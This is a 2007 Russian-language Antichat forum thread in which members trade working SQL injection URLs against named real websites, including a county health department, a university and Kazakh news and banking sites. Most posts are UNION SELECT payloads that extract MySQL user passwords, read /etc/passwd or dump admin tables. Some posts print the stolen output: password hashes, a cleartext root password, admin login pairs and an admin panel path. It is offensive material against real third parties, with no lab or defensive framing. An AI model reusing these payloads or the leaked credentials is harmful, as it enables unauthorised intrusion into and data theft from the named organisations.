ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2611  
Старый 02.07.2007, 19:34
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,password,user,5+from+mysql.user/*
как мне и посоветовал iv буду развивть скули
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать

Последний раз редактировалось Extremal; 02.07.2007 в 20:48..
 
Ответить с цитированием

  #2612  
Старый 02.07.2007, 20:01
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Цитата:
Сообщение от Extremal  
Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*

Последний раз редактировалось kair; 02.07.2007 в 20:03..
 
Ответить с цитированием

  #2613  
Старый 02.07.2007, 20:17
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
Talking

Ещё 2 нашел
Код:
http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,2,3,4,5,6,USER(),version()/*
Код:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,user(),DATABASE()/*
Из за своего малого опыта в скуль инъекциях ни че подобрать не удалось...может у вас чё нить получиться

Последний раз редактировалось Extremal; 02.07.2007 в 20:44..
 
Ответить с цитированием

  #2614  
Старый 02.07.2007, 20:25
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.paintball.ru/next.php?id=430%20union%20select%201,2,COLUMN_NAME%20FROM+INFORMATION_SCHEMA.COLUMNS%20limit%200,1/*
columns
Код:
CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN ID IS_DEFAULT IS_COMPILED SORTLEN TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME ORDINAL_POSITION COLUMN_DEFAULT IS_NULLABLE DATA_TYPE CHARACTER_MAXIMUM_LENGTH CHARACTER_OCTET_LENGTH NUMERIC_PRECISION NUMERIC_SCALE COLUMN_TYPE COLUMN_KEY EXTRA PRIVILEGES COLUMN_COMMENT GRANTEE PRIVILEGE_TYPE IS_GRANTABLE CONSTRAINT_CATALOG CONSTRAINT_SCHEMA CONSTRAINT_NAME POSITION_IN_UNIQUE_CONSTRAINT REFERENCED_TABLE_SCHEMA REFERENCED_TABLE_NAME  REFERENCED_COLUMN_NAME QUERY_ID SEQ DURATION CPU_USER CPU_SYSTEM CONTEXT_VOLUNTARY CONTEXT_INVOLUNTARY BLOCK_OPS_IN BLOCK_OPS_OUT MESSAGES_SENT MESSAGES_RECEIVED PAGE_FAULTS_MAJOR PAGE_FAULTS_MINOR SWAPS SOURCE_FUNCTION SOURCE_FILE SOURCE_LINE SPECIFIC_NAME ROUTINE_CATALOG ROUTINE_SCHEMA ROUTINE_NAME ROUTINE_TYPE DTD_IDENTIFIER ROUTINE_BODY ROUTINE_DEFINITION EXTERNAL_NAME EXTERNAL_LANGUAGE PARAMETER_STYLE IS_DETERMINISTIC SQL_DATA_ACCESS SQL_PATH SECURITY_TYPE CREATED LAST_ALTERED SQL_MODE ROUTINE_COMMENT DEFINER CATALOG_NAME SCHEMA_NAME DEFAULT_CHARACTER_SET_NAME DEFAULT_COLLATION_NAME NON_UNIQUE INDEX_SCHEMA INDEX_NAME SEQ_IN_INDEX COLLATION CARDINALITY SUB_PART PACKED NULLABLE INDEX_TYPE COMMENT TABLE_TYPE ENGINE VERSION ROW_FORMAT TABLE_ROWS AVG_ROW_LENGTH DATA_LENGTH MAX_DATA_LENGTH INDEX_LENGTH DATA_FREE AUTO_INCREMENT CREATE_TIME
TABLE
Код:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS pb_cat pb_cat_tree pb_city pb_club pb_dealer pb_info pb_journal_obl pb_journal_st pb_kalendar pb_links pb_news pb_news_theme pb_portal pb_reviews pb_team pb_users
Код:
http://earthdata.com/newsarticle.php?id=430%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(user,0x78),0x78),AES_DECRYPT(AES_ENCRYPT(password,0x78),0x78),4,5,6%20from%20mysql.user

Код:
http://www.phfokc.com/show_press.php?id=430%20union%20select%201,2,version(),4/*
5versia

Код:
  http://www.eatmybrains.com/showfeature.php?id=430%20union%20select%201,2,3,name,5,version(),7,8,9,10,11,12,13,14,15,16%20from%20user/*
Код:
http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*
где можно посмотреть список sql inj, а то могут повторяться
 
Ответить с цитированием

  #2615  
Старый 02.07.2007, 21:46
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

kair
http://hack-shop.org.ru/sql.php
 
Ответить с цитированием

  #2616  
Старый 03.07.2007, 00:01
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от kair  
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*
root:0a53c31a74397e18
Так лучше:
username = "root";
password = "jd4495jv";
таблица:
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,3,concat(username,0x3a,password),5+from+meg.admin/*
админка закрыта на уровне htaccess
http://www.clarkhealthdept.org/admin
 
Ответить с цитированием

  #2617  
Старый 03.07.2007, 00:05
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Код:
http://latchmusic.com/1-2-3-music-store/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*
получаем л+п:

hacked:hax
 
Ответить с цитированием

  #2618  
Старый 03.07.2007, 00:26
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

paradigma.kz
bankinfo.kz
sports.kz

Код:
http://www.paradigma.kz/index.php?part=info&article_type_id=-1+union+select+1,VERSION(),database(),4,5,6,7,8,9,10,11,12,13/*
Код:
http://bankinfo.kz/rus/banks/bank.shtml?id_bank=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Код:
http://sports.kz/news.php?type=small&id=-1+union+select+1,2,VERSION(),4,5,USER(),7,8/*
 
Ответить с цитированием

  #2619  
Старый 03.07.2007, 00:56
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

Цитата:
Сообщение от kair  
где можно посмотреть список sql inj, а то могут повторяться
http://antiboyansql.narod.ru/sql.txt
 
Ответить с цитированием

  #2620  
Старый 03.07.2007, 01:53
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.deng-yun.com/new.php?tid=-1+union+select+convert(version()+using+latin1)+fro m+mysql.user/*
Только вот не получается ничего оттуда вывести
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ